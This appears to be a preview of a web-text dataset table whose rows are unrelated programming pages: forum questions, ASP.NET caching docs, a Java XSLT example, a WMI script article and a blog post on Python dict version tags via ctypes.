text stringlengths 20 1.01M | url stringlengths 14 1.25k | dump stringlengths 9 15 ⌀ | lang stringclasses 4
values | source stringclasses 4
values |
|---|---|---|---|---|
I honestly could not figure this one out for the life of me. I thought the “solution” would help me figure out what it was asking for, but it seems that most people in the forums used the “converting the integer into a string” method. can someone explain the solution’s method instead?
.)”
def digit_sum(x): total = 0 while x > 0: total += x % 10 x = x // 10 print x return total
I understand the method using strings but what is going on here? I’d just like a step by step explanation
| https://discuss.codecademy.com/t/digit-sum-alternate-solution/353040 | CC-MAIN-2018-43 | en | refinedweb |
I cant get the output to display the average, high, and low. Any hints?
/*. Use the following screen shots as a guide. */ #include <iostream> using namespace std; int main() { double scores[75]; int counter = -1; do { counter++; cout << "Please enter a score (enter -1 to stop): "; cin >> scores[counter]; } while (scores[counter] >= 0); }
I am very new at C++, I dont know where or how to add the High, Low, and Average in?
Any help would be greatly appreciated.
Thanks,
Mac | https://www.daniweb.com/programming/software-development/threads/160191/one-dimensional-arrays-of-integers-problem | CC-MAIN-2018-43 | en | refinedweb |
Dear community,
Could you point me to some documentation or explain how to incorporate a date range filter into an HCI search query.
I've got this, but need a date range in there e.g. last 24 hours.
{
"indexName": "ECMReport",
"facetRequests": [
{
"fieldName": "HCI_namespace"
}
]
}
Hedde
Hi Hedde,
In the queryString itself, you can use this syntax for specific fields of type date:
dateField:[2017-10-19 TO *]
Examples:
"dateField:2000-11" – The entire month of November, 2000.
"dateField:2000-11T13" – Likewise but for an hour of the day (1300 to before 1400, i.e. 1pm to 2pm).
"dateField:[2000-11-01 TO 2014-12-01]" – The specified date range at a day resolution.
"dateField:[2014 TO 2014-12-01]" – From the start of 2014 till the end of the first day of December.
"dateField:[* TO 2014-12-01]" – From the earliest representable time thru till the end of the day on 2014-12-01.
"datefield:[1972-05-20T17:33:18.772Z TO *]" - From a specific instant in time to now
The "[" & "]" brackets indicate inclusive searches, and you can replace them on either side with "{" or "}" for exclusive ranges.
-Ben | https://community.hitachivantara.com/thread/12398-hci-query-api-date-range-filter | CC-MAIN-2018-43 | en | refinedweb |
These are chat archives for orbitjs/orbit.js
Storeautomatically when the ember-orbit addon is present. Unfortunately, ember addons include ember-data by default so we can’t expose it as
service:store. It seems like the pragmatic way forwards for now is to expose it as
service:orbitStore. Any thoughts?
// where topology is a preset for the co-ordinator ENV.emberOrbit = { topology: { offline: 'localStorage', remote: 'rethinkdb' }, sources: { localStorage: { namespace: 'appName' }, rethinkdb: { host: '', username: 'abc', password: '123' }, jsonApi: { host: '', username: 'abc', password: '123' } } }
ENV.emberOrbit = { topology: { preset: ‘optimisticui', offline: 'localStorage', remote: 'rethinkdb' }, // ... }
@dgeb I’ve got a bare bones demo running,
If you want to try it out you’ll need to manually link and
It’s a very bare bones slack clone at the moment, with just an in-memory store/cache. If you see a text box, just enter something and hit return. (rooms on the left, messages at the bottom).
I’m considering pulling orbit-rethinkdb together as I’ve already done the hard work of implementing mutations and listeners, we just need to pin down how
orbitStore.liveQuery and
source.liveQuery will work.
@dgeb thought I'd get the ball rolling with the liveQuery api.
We've discussed the API for the store already, I think we got to:
liveQuery = store.liveQuery() liveQuery.subscribe(operation => {})
where liveQuery is the results from store.cache.liveQuery.
The question is how liveQueries are distributed to other sources.
LiveQueryable = { init(...args) { this._super(...args); Evented.extend(this); } liveQuery(query) { // not sure if any of the existing Evented methods match 'mapAll' here const promisedLiveQueries = Promise.all([ this._liveQuery(query), ...this.mapAll('liveQuery', query) ]); return promisedLiveQueries.then(liveQueries => RxJS.Observeable.merge(liveQueries)); } } export default Source.extend({ init(...args) { this._super(...args); LiveQueryable.extend(this); }, _liveQuery(query) { // setup liveQuery for current source } });
to wire up the sources
sourceA.on('liveQuery', sourceB.liveQuery); sourceA.on('liveQuery', sourceC.liveQuery); sourceC.on('liveQuery', sourceD.liveQuery); new Orbit.TransformConnector(sourceA, sourceB); new Orbit.TransformConnector(sourceA, sourceC);
note the connectors are uni-directional, all results flow back to the store via the liveQueries (still thinking on the implications of this). | https://gitter.im/orbitjs/orbit.js/archives/2016/01/07 | CC-MAIN-2018-43 | en | refinedweb |
We saw the use of the
javax.xml.transform package and two of its subpackages in
the output( ) method of Example 19-2. There it was used to perform an
"identity transform," converting a
DOM tree into the corresponding XML file. But transforming the format
of an XML document is not the only purpose of these packages. They
can also be used to transform XML content according to the rules of
an XSL stylesheet. The code required to do this is remarkably simple;
it's shown in Example 19-3. This
example uses javax.xml.transform.stream to read
files containing a source document and a stylesheet, and to write the
output document to another file. JAXP can be even more flexible,
however: the transform.dom and
transform.sax subpackages allow the program to be
rewritten to (for example) transform a document represented by a
series of SAX parser events into a DOM tree, using a stylesheet read
from a file.
package je3.xml;
import java.io.*;
import javax.xml.transform.*;
import javax.xml.transform.stream.*;
/**
* Transforms an input document to an output document using an XSLT stylesheet.
* Usage: java XSLTransform input stylesheet output
**/
public class XSLTransform {
public static void main(String[ ] args) throws TransformerException {
// Set up streams for input, stylesheet, and output.
// These do not have to come from or go to files. We can also use the
// javax.xml.transform. {dom,sax} packages use DOM trees and streams of
// SAX events as sources and sinks for documents and stylesheets.
StreamSource input = new StreamSource(new File(args[0]));
StreamSource stylesheet = new StreamSource(new File(args[1]));
StreamResult output = new StreamResult(new File(args[2]));
// Get a factory object, create a Transformer from it, and
// transform the input document to the output document.
TransformerFactory factory = TransformerFactory.newInstance( );
Transformer transformer = factory.newTransformer(stylesheet);
transformer.transform(input, output);
}
}
In order to use this example, you'll need an
XSL
stylesheet. A tutorial on XSL is beyond the scope of this chapter,
but Example 19-4 shows one to get you started. This
stylesheet is intended for processing the XML log files created by
the java.util.logging package. For each
<record> tag it encounters in the log file,
it extracts the textual contents of the
<sequence>, <date>,
and <message> subtags, and combines them
into a single line of output. This discards some of the log
information, but shrinks and simplifies the log file, making it more
human-readable.
<?xml version="1.0"?>
<xsl:stylesheet
<xsl:template
<xsl:value-of
<xsl:text>: </xsl:text>
<xsl:value-of
<xsl:text>: </xsl:text>
<xsl:value-of
</xsl:template>
</xsl:stylesheet> | http://books.gigatux.nl/mirror/javaexamples/0596006209_jenut3-chp-19-sect-3.html | CC-MAIN-2018-43 | en | refinedweb |
[
]
Pepijn Noltes edited comment on CELIX-77 at 10/15/13 7:20 PM:
--------------------------------------------------------------
Added md5 sum for the config_admin patch for grant identification
was (Author: pnoltes):
md5 sum for the config_admin patch to identify it for the grant.
> Configuration Admin Implementation - Beginning
> ----------------------------------------------
>
> Key: CELIX-77
> URL:
> Project: Celix
> Issue Type: New Feature
> Affects Versions: 0.0.1-incubating
> Reporter: Jorge SANCHEZ
> Priority: Minor
> Labels: patch
> Attachments: CELIX-77_config_admin.zip, CELIX-77_config_admin.zip.md5
>
>
> Hi all.
> I want to contribute a first humble implementation of the Configuration Admin service.
Here some comments of what's is capable of this implementation; I do recommend to have some
knowledge of the service to understand them.
> Currently it's implemented the next public classes: ConfigurationAdmin, ManagedService
and Configuration. Not all the functionality of those classes is done, there is still work
to do.
> From the point of view of the API's user, the current implementation deals only with
ManagedService targets and the user can create new Configuration objects, get an existing
Configuration or update the Configuration through the method configuration.update() which
triggers asynchronous callbacks to the ManagedService implementation. The concept of visibility
between bundles and bindings between ManagedService targets and Configurations is solved,
but due to the Configuration Permission class is not implemented yet, everything is allowed
or authorized and nothing is restricted.
> The code of the service is quite clean, except for, perhaps, the “overwhelming of printf's”
that I used to help me in the debugging and that I haven't removed yet. Another issue of this
is, there is a folder with some “dummy” examples that I use and modify constantly for
debugging, I must recognize that they are not very clean and I don't know if someone can understand
something, but I've decided to included them because may be someone can find them useful.
> Finally, as I appointed, there is still much work to do, but I hope with my contribution
give a first light in the development of the service.
> I'm newbie with CELIX and I'm completely lost with the licenses, procedures, etc, …,
please any incoming from you it's welcome.
> I don't want to make larger this email to avoid confusion. Please, if any of you have
any doubts, I'd be pleased to answer them, don't hesitate to write me.
> Friendly greetings,
> Jorge SANCHEZ
> P.S.: in the private directory there is a "framework patch", I had to do it because I
was missing some functions in the framework that I could not ignore or do it in another different
way
--
This message was sent by Atlassian JIRA
(v6.1#6144) | http://mail-archives.apache.org/mod_mbox/celix-commits/201310.mbox/%3CJIRA.12663037.1376135759862.67920.1381864962298@arcas%3E | CC-MAIN-2018-43 | en | refinedweb |
I am having an issue getting directions to return when using ModelBuilder or through a network service with ArcGIS server. In 10.1 desktop the directions work fine, and return in the directions window. Also, The model that I made works in 10, and without the directions it works in 10.1. When the directions are set to not return (as false) in the network service a route is returned as well. But when in 10.1 both the model version of the route solve with directions as well as the network service return error 030020: failed to generate directions. Solve required prior to generating directions". Is this some sort of bug, or am I missing something?
Thanks,
Eric
Thanks,
Eric
Could you please elaborate on your steps you do (describe briefly)
1) to build a model (what GP tools do you use and what is input/output)
2) to publish a GP service (which you create as I understood)
As a quick check though, I'd suggest running the test with the original (not modified resources.xml) directions file just to make sure it does not work with original directions files either. This is because I've seen this error message in ArcGIS Desktop environments too when the localized directions files have been used. | https://community.esri.com/thread/52299-directions-in-101-not-working-with-modelbuilder-or-in-anbsp-network-service | CC-MAIN-2018-43 | en | refinedweb |
Response Caching Middleware in ASP.NET Core
By Luke Latham and John Luo
View or download ASP.NET Core 2.1 sample code (how to download)
This article explains how to configure Response Caching Middleware in an ASP.NET Core app. The middleware determines when responses are cacheable, stores responses, and serves responses from cache. For an introduction to HTTP caching and the
ResponseCache attribute, see Response Caching.
Package
Reference the Microsoft.AspNetCore.App metapackage or add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Reference the Microsoft.AspNetCore.All metapackage or add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Add a package reference to the Microsoft.AspNetCore.ResponseCaching package.
Configuration
In
Startup.ConfigureServices, add the middleware to the service collection.
public void ConfigureServices(IServiceCollection services) { services.Configure<CookiePolicyOptions>(options => { options.CheckConsentNeeded = context => true; options.MinimumSameSitePolicy = SameSiteMode.None; }); services.AddResponseCaching(); services.AddMvc() .SetCompatibilityVersion(CompatibilityVersion.Version_2_1); }
Configure the app to use the middleware with the
UseResponseCaching extension method, which adds the middleware to the request processing pipeline. The sample app adds a
Cache-Control header to the response that caches cacheable responses for up to 10 seconds. The sample sends a
Vary header to configure the middleware to serve a cached response only if the
Accept-Encoding header of subsequent requests matches that of the original request. In the code example that follows, CacheControlHeaderValue and HeaderNames require a
using statement for the Microsoft.Net.Http.Headers namespace.ResponseCaching(); app.Use(async (context, next) => { // For GetTypedHeaders, add: using Microsoft.AspNetCore.Http; context.Response.GetTypedHeaders().CacheControl = new Microsoft.Net.Http.Headers.CacheControlHeaderValue() { Public = true, MaxAge = TimeSpan.FromSeconds(10) }; context.Response.Headers[Microsoft.Net.Http.Headers.HeaderNames.Vary] = new string[] { "Accept-Encoding" }; await next(); }); app.UseMvc(); }
Response Caching Middleware only caches server responses that result in a 200 (OK) status code. Any other responses, including error pages, are ignored by the middleware.
Warning
Responses containing content for authenticated clients must be marked as not cacheable to prevent the middleware from storing and serving those responses. See Conditions for caching for details on how the middleware determines if a response is cacheable.
Options
The middleware offers three options for controlling response caching.
The following example configures the middleware to:
- Cache responses smaller than or equal to 1,024 bytes.
- Store the responses by case-sensitive paths (for example,
/page1and
/Page1are stored separately).
services.AddResponseCaching(options => { options.UseCaseSensitivePaths = true; options.MaximumBodySize = 1024; });
VaryByQueryKeys
When using MVC/Web API controllers or Razor Pages page models, the
ResponseCache attribute specifies the parameters necessary for setting the appropriate headers for response caching. The only parameter of the
ResponseCache attribute that strictly requires the middleware is
VaryByQueryKeys, which doesn't correspond to an actual HTTP header. For more information, see ResponseCache Attribute.
When not using the
ResponseCache attribute, response caching can be varied with the
VaryByQueryKeys feature. Use the
ResponseCachingFeature directly from the
IFeatureCollection of the
HttpContext:
var responseCachingFeature = context.HttpContext.Features.Get<IResponseCachingFeature>(); if (responseCachingFeature != null) { responseCachingFeature.VaryByQueryKeys = new[] { "MyKey" }; }
Using a single value equal to
* in
VaryByQueryKeys varies the cache by all request query parameters.
HTTP headers used by Response Caching Middleware
Response caching by the middleware is configured using HTTP headers.
Caching respects request Cache-Control directives
The middleware respects the rules of the HTTP 1.1 Caching specification. The rules require a cache to honor a valid
Cache-Control header sent by the client. Under the specification, a client can make requests with a
no-cache header value and force the server to generate a new response for every request. Currently, there's no developer control over this caching behavior when using the middleware because the middleware adheres to the official caching specification.
For more control over caching behavior, explore other caching features of ASP.NET Core. See the following topics:
- Cache in-memory
- Work with a distributed cache
- Cache Tag Helper in ASP.NET Core MVC
- Distributed Cache Tag Helper
Troubleshooting
If caching behavior isn't as expected, confirm that responses are cacheable and capable of being served from the cache. Examine the request's incoming headers and the response's outgoing headers. Enable logging to help with debugging.
When testing and troubleshooting caching behavior, a browser may set request headers that affect caching in undesirable ways. For example, a browser may set the
Cache-Control header to
no-cache or
max-age=0 when refreshing a page. The following tools can explicitly set request headers and are preferred for testing caching:
Conditions for caching
- The request must result in a server response with a 200 (OK) status code.
- The request method must be GET or HEAD.
- Terminal middleware, such as Static File Middleware, must not process the response prior to the Response Caching Middleware.
- The
Authorizationheader must not be present.
Cache-Controlheader parameters must be valid, and the response must be marked
publicand not marked
private.
- The
Pragma: no-cacheheader must not be present if the
Cache-Controlheader isn't present, as the
Cache-Controlheader overrides the
Pragmaheader when present.
- The
Set-Cookieheader must not be present.
Varyheader parameters must be valid and not equal to
*.
- The
Content-Lengthheader value (if set) must match the size of the response body.
- The IHttpSendFileFeature isn't used.
- The response must not be stale as specified by the
Expiresheader and the
max-ageand
s-maxagecache directives.
- Response buffering must be successful, and the size of the response must be smaller than the configured or default
SizeLimit.
- The response must be cacheable according to the RFC 7234 specifications. For example, the
no-storedirective must not exist in request or response header fields. See Section 3: Storing Responses in Caches of RFC 7234 for details.
Note
The Antiforgery system for generating secure tokens to prevent Cross-Site Request Forgery (CSRF) attacks sets the
Cache-Control and
Pragma headers to
no-cache so that responses aren't cached. For information on how to disable antiforgery tokens for HTML form elements, see ASP.NET Core antiforgery configuration. | https://docs.microsoft.com/en-us/aspnet/core/performance/caching/middleware?view=aspnetcore-2.1 | CC-MAIN-2018-43 | en | refinedweb |
When writing a script, you don't always get it right the first time. That was a worthwhile lesson that our engineering team recently learned. Every month when Microsoft releases security updates, our engineering team must automate their installation. Generally, this is a simple task of running the patch executable with switches for silent remote deployment through HP's ProLiant Essentials Rapid Deployment Package (RDP), our deployment standard for Windows 2000 servers. However, there are times when a security update isn't a simple install. For example, that was the case with the security update commonly known as the graphics device interface (GDI) update associated with Microsoft Security Bulletin MS04-028 "Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution" (). The GDI security update affected various versions and editions of Windows and its components, including the Windows .NET Framework 1.1 and Framework 1.0 Service Pack 2 (SP2).
In the side-by-side execution model, Framework 1.1 and 1.0 coexist on a system, which lets developers use either or both versions in their applications. However, in most cases, it's simpler to upgrade to version 1.1 and not support side-by-side execution, provided the applications compiled for version 1.0 continue to function as expected. (In most cases, applications compiled for version 1.0 will continue to work properly on version 1.1. For more information about the versions, see "Versioning, Compatibility, and Side-by-Side Execution in the .NET Framework,".)
Because the GDI security update affected both Framework versions and we support side-by-side execution, it was essential for us to detect each server's Framework version and service pack level to ensure that the correct update would be applied. Moreover, because the Framework is an optional install in our Windows 2000 build, we also had to ensure that servers with no Framework installed didn't receive a GDI update. Thus, we decided to create a script that queries a server for its installed products and identifies the installed Framework versions and service pack levels if found. Although it took a few attempts to get it right, the result was worth it.
The First Attempt
There are multiple ways to confirm that a product is installed on a system. For example, you can read the registry, read an .ini file, or look for a specific file. Because both Framework versions were installed with Windows Installer (i.e., .msi packages) we found it easiest to use Windows Management Instrumentation's (WMI's) Win32_Product class and its properties. Using WMI's ExecQuery method to query the Win32_Product class returns instances of the Win32_Product class that represents products installed with Windows Installer. We then enumerated and compared the names of the products installed on a system with the display names of Framework 1.1 and Framework 1.0.
As Listing 1 shows, the script begins by declaring the computer name on which the script is to run. The strComputer variable stores this value. Because the script is to connect to the local computer, strComputer is set to a period. Next, the script calls the GetObject method to connect to WMI's root\cimv2 namespace, which contains the Win32_Product class.
Callout A in Listing 1 shows the heart of the script. This code stores the Windows Query Language (WQL) query in the wqlQuery variable, then calls WMI's ExecQuery method to run that query. Running the query returns a collection of objects, which the code assigns to the colProducts variable. Using a For Each...Next statement, the script iterates through the collection. The Select Case statement in the For Each...Next loop compares the name of the product (exposed by the Win32_Product class's Name property) with Microsoft .NET Framework 1.1 and Microsoft .NET Framework (English) to confirm if any or both Framework products are installed on the server.
The Second Attempt
The WQL query in callout A in Listing 1 is a general query that will return a collection of all installed .msi packages. Thus, the For Each...Next loop must iterate through the entire collection. Because we were interested in only querying for the Framework, we decided to optimize the query by modifying it to include a Where clause that limited the search to only the installed Framework products. Listing 2 shows the script with the optimized query.
We also optimized the ExecQuery method by including the wbemFlagReturnImmediately and wbemFlagForwardOnly flags, as callout A in Listing 2 shows. The wbemFlagReturnImmediately flag ensures that the WMI call doesn't wait for the query to complete before returning the result. The wbemFlagForwardOnly flag ensures that forward-only enumerators are returned. Forward-only enumerators are generally faster than bidirectional enumerators. (To learn more about the ExecQuery method and its parameters and flags, go to.)
The Third Attempt
Easier is not always better, as we learned after running the script in Listing 2. Although it was easiest to write a script using Win32_Product class, the class took up to 20 seconds to return the results, even with the optimized query. Because we were to run this script on more than 200 servers, the long wait wasn't acceptable. As an alternative, we decided to try a different approach: check the registry to confirm whether the Framework was installed on each server. The result is the script that Listing 3 shows.
Like the scripts in Listing 1 and Listing 2, the script in Listing 3 begins by setting the strComputerName variable to the local computer, but this is where the similarity ends. The differences begin with the WMI moniker statement in the GetObject call, which callout A in Listing 3 shows. In the other two scripts, the WMI moniker included the root\cimv2 namespace. For registry management, WMI provides the StdRegProv class. All WMI versions include and register the StdRegProv class, so WMI places this class in the root\default namespace by default. Thus, you have to connect to the root\default namespace (and not the root\cimv2 namespace) to use the StdRegProv provider.
StdRegProv exposes the GetStringValue method, which you can use to read the data from a registry entry whose value is of type REG_SZ. When you use the GetStringValue method, you must include four parameters in the following order:
Key tree root. The key tree root parameter specifies the target hive in the registry. Web Table 1 shows the UInt32 values (i.e., numeric constants) that represent the hives. The default hive is HKEY_LOCAL_MACHINE, which has a value of &H80000002.
Subkey. The subkey parameter specifies the registry path (not including the hive) to the registry entry that contains the value you want to retrieve.
Entry. The entry parameter specifies the name of the entry from which you're retrieving the value.
Out variable. The GetStringValue method reads the specified entry's value into a variable. You use the out variable parameter to specify the name of that variable.
All applications that can be uninstalled create a subkey under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall key. Thus, the Uninstall key is the base key under which the script looks for one of three subkeys: Microsoft .NET Framework (English), Microsoft .NET Framework Full v1.0.3705 (1033), or \{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1\}. Microsoft .NET Framework (English) and Microsoft .NET Framework Full v1.0.3705 (1033) both represent Framework 1.0. When I first downloaded Framework 1.0 a while back, the subkey created was named Microsoft .NET Framework (English). If you download and install Framework 1.0 now, the subkey name is Microsoft .NET Framework Full v1.0.3705 (1033). (Microsoft sometimes changes names to make them more meaningful.) The \{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1\} subkey represents Framework 1.1.
As callout B in Listing 3 shows, the script uses a constant and two variables to provide the registry information. First, the script sets the HKEY_LOCAL_MACHINE constant to &H80000002. That constant is used for the GetStringValue method's key tree root parameter. Because the script is checking three subkeys under the Uninstall key, the script uses two variables—strKey and arrKeysToCheck—to specify the subkey parameter. The strKey variable holds the string SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. The arrKeysToCheck variable contains an array that includes three elements: the strings Microsoft .NET Framework (English), Microsoft .NET Framework Full v1.0.3705 (1033), and \{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1\}.
In Listing 3, the GetStringValue method's entry parameter is DisplayName. Remember that the Win32_Product class's Name property exposes the name of the products installed by Windows Installer. In the registry, the DisplayName entry stores the Name property's value. GetStringValue's last parameter is the strDisplayName variable.
When the script runs, it iterates through the arrKeysToCheck array and calls the StdRegProv's GetStringValue method for each element in the array, as callout C in Listing 3 shows. After GetStringValue passes the DisplayName entry's value to the strDisplayName variable, the script displays the value.
On completion, the GetStringValue method returns a 0 if successful or some other value if an error occurred. Because the Framework was an optional install in our environment, there are instances in which none of the three subkeys exist in the registry. Such instances could cause the GetStringValue method to fail and throw an error, which in turn could cause the script to fail. To avoid this problem, the On Error Resume Next statement appears before calling the For Each...Next loop to ensure that the script continues to run, even if GetStringValue throws an error.
Success!
The script in Listing 3 provided our engineering team with a viable, fast solution that determined whether Framework 1.1, Framework 1.0, or both were installed on a machine. However, we also needed to determine the Framework service pack levels. So, we decided to build on Listing 3 and add code to check for service pack information.
After some investigation, we discovered that Microsoft doesn't provide a direct means to detect Framework service pack levels. However, there are indirect means. For Framework 1.1, you can check the SP registry entry under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v1.1.4322 subkey. A value of 1 means that Framework 1.1 SP1 is installed.
Checking the registry won't work for Framework 1.0. Instead, Microsoft suggests that you check the version of the mscorcfg.dll file. Web Table 2 shows the correlation between the file versions and the service pack levels.
With the service pack information in hand, we started writing the DetectFramework.vbs script that Listing 4 shows. The first part of DetectFramework.vbs should look familiar. It uses the StdRegProv class's GetStringValue method to read the DisplayName entry's value into the strDisplayName variable. However, rather than display strDisplayName's value, the script starts to go through a series of embedded If...Then...Else and Select Case statements. If the GetStringValue method returns a value of 0 (i.e., the method was successful and thus a Framework version is installed), the script proceeds to a Select Case statement that determines whether strDisplayName's value is the string Microsoft .NET Framework 1.1 or the string Microsoft .NET Framework (English).
Microsoft .NET Framework 1.1. When strDisplayName contains the string Microsoft .NET Framework 1.1, the script checks the SP registry entry for the value of 1. To do so, it uses StdRegProv's GetDWORDValue method, which reads data from a registry entry whose value is of type REG_DWORD. Like GetStringValue, GetDWORDValue requires four parameters specifying the hive, the subkey name, the entry name, and the name of the variable that will store the entry's value.
After GetDWORDValue reads the SP entry's value, the Select Case statement at callout A in Listing 4 compares that value against the value of 1. When a match occurs, the script displays the message Microsoft .NET Framework 1.1 SP1 found. When a match doesn't occur, the script displays the message Microsoft .NET Framework 1.1 found. In other words, although Framework 1.1 was installed, SP1 wasn't.
Microsoft .NET Framework (English). When strDisplayName contains the string Microsoft .NET Framework (English), the script checks the version of the mscorcfg.dll file. The Microsoft Scripting Runtime Library's FileSystemObject object provides the GetFileVersion method, which returns the version of a given file. This method requires only one parameter: the path to the target file.
Before using GetFileVersion, though, the script checks for the file's existence. Although mscorcfg.dll must exist on the system if Framework 1.0 is installed, it's good scripting practice to check for a file's existence before attempting to get its version number. This practice ensures that the script won't stop with a File Not Found error at runtime.
To check for the mscorcfg.dll file's existence, the script uses the FileSystemObject object's FileExists method, as the code at callout B in Listing 4 shows. Like the GetFileVersion method, the FileExists method's only parameter is the path to the target file. If the file exists, the script calls the GetFileVersion method.
The Select Case statement at callout C in Listing 4 compares the version number that GetFileVersion returns with the four possible version numbers shown in Web Table 2. When a match occurs, the script displays the corresponding message that identifies the service pack level.
To confirm that DetectFramework.vbs correctly detects the installed Framework version and service pack level, we tested the script by running it on a server installed with Framework 1.0 only, a server installed with Framework 1.1 only, a server installed with both versions, and a server that didn't have Framework installed. Further, after installing the latest service pack for each Framework version, we tested the script to ensure that we received the expected results. And expected results are what we received.
Challenging But Worth It
Although it took a lot of trial and error to create DetectFramework.vbs, it was worth the effort. And, as we state in engineering, a world without challenges would be a very boring world. | https://www.itprotoday.com/devops-and-software-development/don-t-expect-get-it-right-first-time | CC-MAIN-2018-43 | en | refinedweb |
This notebook originally appeared as a post on the blog Pythonic Perambulations. The content is MIT licensed.
I just got home from my sixth PyCon, and it was wonderful as usual. If you weren't able to attend—or even if you were—you'll find a wealth of entertaining and informative talks on the PyCon 2017 YouTube channel.
Two of my favorites this year were a complementary pair of talks on Python dictionaries by two PyCon regulars: Raymond Hettinger's Modern Python Dictionaries A confluence of a dozen great ideas and Brandon Rhodes' The Dictionary Even Mightier (a followup of his PyCon 2010 talk, The Mighty Dictionary)EP509."
He later went on to say,
"[The version number] is internal; I haven't seen an interface for users to get to it..."
which, of course, I saw as an implicit challenge. So let's expose it!
In a post a few years ago, I showed how to use the
ctypes module to muck around in the internals of CPython's implementation at runtime, and I'll use a similar strategy here.
Briefly, the approach is to define a
ctypes.Structure object that mirrors the sructure CPython uses to implement the type in question.
We can start with the base structure that underlies every Python object:
typedef struct _object { _PyObject_HEAD_EXTRA Py_ssize_t ob_refcnt; struct _typeobject *ob_type; } PyObject;
A
ctypes wrapper might look like this:
import sys assert (3, 6) <= sys.version_info < (3, 7) # Valid only in Python 3.6 import ctypes py_ssize_t = ctypes.c_ssize_t # Almost always the case class PyObjectStruct(ctypes.Structure): _fields_ = [('ob_refcnt', py_ssize_t), ('ob_type', ctypes.c_void_p)]
Next, let's look at the Python 3.6
PyDictObject definition, which boils down to this:
typedef struct { PyObject_HEAD Py_ssize_t ma_used; uint64_t ma_version_tag; PyDictKeysObject *ma_keys; PyObject **ma_values; } PyDictObject;
We can mirror the structure behind the
dict this way, plus add some methods that will be useful later:
class DictStruct(PyObjectStruct): _fields_ = [("ma_used", py_ssize_t), ("ma_version_tag", ctypes.c_uint64), ("ma_keys", ctypes.c_void_p), ("ma_values", ctypes.c_void_p), ] def __repr__(self): return (f"DictStruct(size={self.ma_used}, " f"refcount={self.ob_refcnt}, " f"version={self.ma_version_tag})") @classmethod def wrap(cls, obj): assert isinstance(obj, dict) return cls.from_address(id(obj))
As a sanity check, let's make sure our structures match the size in memory of the types they are meant to wrap:
assert object.__basicsize__ == ctypes.sizeof(PyObjectStruct) assert dict.__basicsize__ == ctypes.sizeof(DictStruct)
With this setup, we can now wrap any dict object to get a look at its internal properties. Here's what this gives for a simple dict:
D = dict(a=1, b=2, c=3) DictStruct.wrap(D)
DictStruct(size=3, refcount=1, version=508220)
To convince ourselves further that we're properly wrapping the object, let's make two more explicit references to this dict, add a new key, and make sure the size and reference count reflect this:
D2 = D D3 = D2 D3['d'] = 5 DictStruct.wrap(D)
DictStruct(size=4, refcount=3, version=515714)
It seems this is working correctly!
So what does the version number do? As Brandon explained in his talk, every dict in CPython 3.6 now has a version number that is
This global value is stored in the
pydict_global_version variable in the CPython source.
So if we create a bunch of new dicts, we should expect each to have a higher version number than the last:
for i in range(10): dct = {} print(DictStruct.wrap(dct))
DictStruct(size=0, refcount=1, version=518136) DictStruct(size=0, refcount=1, version=518152) DictStruct(size=0, refcount=1, version=518157) DictStruct(size=0, refcount=1, version=518162) DictStruct(size=0, refcount=1, version=518167) DictStruct(size=0, refcount=1, version=518172) DictStruct(size=0, refcount=1, version=518177) DictStruct(size=0, refcount=1, version=518182) DictStruct(size=0, refcount=1, version=518187) DictStruct(size=0, refcount=1, version=518192)
You might expect these versions to increment by one each time, but the version numbers are affected by the fact that Python uses many dictionaries in the background: among other things, local variables, global variables, and object attributes are all stored as dicts, and creating or modifying any of these results in the global version number being incremented.
Similarly, any time we modify our dict it gets a higher version number:
D = {} Dwrap = DictStruct.wrap(D) for i in range(10): D[i] = i print(Dwrap)
DictStruct(size=1, refcount=1, version=521221) DictStruct(size=2, refcount=1, version=521254) DictStruct(size=3, refcount=1, version=521270) DictStruct(size=4, refcount=1, version=521274) DictStruct(size=5, refcount=1, version=521278) DictStruct(size=6, refcount=1, version=521288) DictStruct(size=7, refcount=1, version=521329) DictStruct(size=8, refcount=1, version=521403) DictStruct(size=9, refcount=1, version=521487) DictStruct(size=10, refcount=1, version=521531)
dict.get_version = lambda obj: DictStruct.wrap(obj).ma_version_tag
--------------------------------------------------------------------------- TypeError Traceback (most recent call last) <ipython-input-8-99d51a65c779> in <module>() ----> 1 dict.get_version = lambda obj: DictStruct.wrap(obj).ma_version_tag TypeError: can't set attributes of built-in/extension type 'dict'
We get an error, because Python protects the attributes of built-in types from this kind of mucking.
But never fear! We can get around this with (you guessed it)
ctypes!
The attributes and methods of any Python object are stored in its
__dict__ attribute, which in Python 3.6 is not a dictionary but a
mappingproxy object, which you can think of as a read-only wrapper of the underlying dictionary:
class Foo: bar = 4 Foo.__dict__
mappingproxy({'__dict__': <attribute '__dict__' of 'Foo' objects>, '__doc__': None, '__module__': '__main__', '__weakref__': <attribute '__weakref__' of 'Foo' objects>, 'bar': 4})
In fact, looking at the Python 3.6
mappingproxyobject implementation, we see that it's simply an object with a pointer to an underlying dict.
typedef struct { PyObject_HEAD PyObject *mapping; } mappingproxyobject;
Let's write a
ctypes structure that exposes this:
import types class MappingProxyStruct(PyObjectStruct): _fields_ = [("mapping", ctypes.POINTER(DictStruct))] @classmethod def wrap(cls, D): assert isinstance(D, types.MappingProxyType) return cls.from_address(id(D)) # Sanity check assert types.MappingProxyType.__basicsize__ == ctypes.sizeof(MappingProxyStruct)
Now we can use this to get a C-level handle for the underlying dict of any mapping proxy:
proxy = MappingProxyStruct.wrap(dict.__dict__) proxy.mapping
<__main__.LP_DictStruct at 0x10667dc80>
And we can pass this handle to functions in the C API in order to modify the dictionary wrapped by a read-only mapping proxy:
def mappingproxy_setitem(obj, key, val): """Set an item in a read-only mapping proxy""" proxy = MappingProxyStruct.wrap(obj) ctypes.pythonapi.PyDict_SetItem(proxy.mapping, ctypes.py_object(key), ctypes.py_object(val))
mappingproxy_setitem(dict.__dict__, 'get_version', lambda self: DictStruct.wrap(self).ma_version_tag)
Once this is executed, we can call
get_version() as a method on any Python dictionary to get the version number:
{}.get_version()
544453
This kind of monkey patching could be used for any built-in type; for example, we could add a
scramble method to strings that randomly chooses upper or lower case for its contents:
import random mappingproxy_setitem(str.__dict__, 'scramble', lambda self: ''.join(random.choice([c.lower(), c.upper()]) for c in self))
